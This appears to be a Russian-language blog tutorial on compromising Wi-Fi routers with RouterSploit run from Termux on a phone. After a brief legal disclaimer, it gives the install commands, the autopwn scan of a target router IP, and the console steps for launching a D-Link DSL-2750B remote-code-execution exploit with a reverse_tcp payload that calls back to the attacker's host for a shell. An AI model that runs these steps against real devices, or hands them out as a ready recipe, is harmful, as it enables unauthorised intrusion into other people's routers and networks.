Всем доброго времени суток, дорогие читатели. Сегодня мы затронем тему взлома различных устройств, и на очереди у нас Wi-Fi роутеры. Для взлома роутеров есть программа - "RouterSploit". Она также, как и Metasploit, позволяет эксплуатировать уязвимости, но только у Wi-Fi роутеров.
Прежде чем приступить к действиям:
ПРЕДУПРЕЖДЕНИЕ!
Данная статья предоставляется лишь для ознакомления. Она не является побуждением к действиям, которые проделывает автор. Создано лишь в образовательных и развлекательных целях. Помните несанкционированный взлом чужих устройств является противоправным действием и карается по закону. Автор проделывает все действия лишь на собственном оборудовании и в собственной локальной сети.
Начнем. Все действия мы будем производить с помощью Termux.
Прежде чем устанавливать и запускать RouterSploit нужно прописать следующие команды:
pip install future
apt install git figlet
Описывать значение этих команд я не буду, так как большинству читателей это неинтересно. К тому же самообучение никто не отменял.
Далее прописываем:
git clone https://github.com/41Team/RoutersploitTermux
Переходим в папку RoutersploitTermux командой:
cd RoutersploitTermux
Запускаем процесс установки:
bash run.sh
По окончании, появится такое сообщение:
Хочу предупредить, что процесс установки занимает довольно продолжительное время, примерно 20-30 минут. Если возникнут какие-либо ошибки, то скорее всего, Вам ничто не поможет. Можете конечно попытаться найти способ, чтобы устранить их, но лично я, перепробовав несколько способов и не найдя рабочего, смирился и бросил. Так и не установив программу на свой первый смартфон (он у меня как подопытный, сначала все тестирую на нем), я попробовал установить её на другой, и о чудо - всё прошло нормально. Получается, все зависит от случая и Вашего телефона. Хотя я подозреваю, что ошибки, которые возникли на первом телефоне, связаны с тем, что он довольно старый.
Давайте же запустим наш RouterSploit и протестируем его:
cd ..
cd routersploit
python rsf.py
После запуска появится следующее:
Данная программа содержит множество эксплойтов для разных моделей роутеров: D-Link, TP-Link, Huawei, Cisco и т.д. Список всех содержащихся эксплойтов можно посмотреть, прописав команду:
show all
Чтобы проверить, можно ли с помощью какого-либо из имеющихся эксплойтов взломать роутер, пишем:
use scanners/autopwn
set target <ip роутера>, например set target 192.168.1.1
exploit
Далее появится список, где будет показано, подвержен ли роутер
какой-либо уязвимости. Как видно на фото, ни одним из эксплойтов мой роутер взломать нельзя.
Если же роутер содержит ту или иную уязвимость, Вы увидите следующее:
Чтобы применить эксплойт прописываем:
use exploits/router/dlink/dsl_2750b_rce
set target <ip роутера>
check
run
set payload reverse_tcp
set lhost <Ваш IP>
run
После этого появится сообщение, перевожу дословно: "Наслаждайся своей раковиной". Взлом прошел успешно.
На этом всё. Не забывайте подписываться на канал и ставить лайки, если Вам понравилась статья. Пишите в комментариях свое мнение, обязательно прислушаюсь и отвечу на все вопросы. До новых встреч!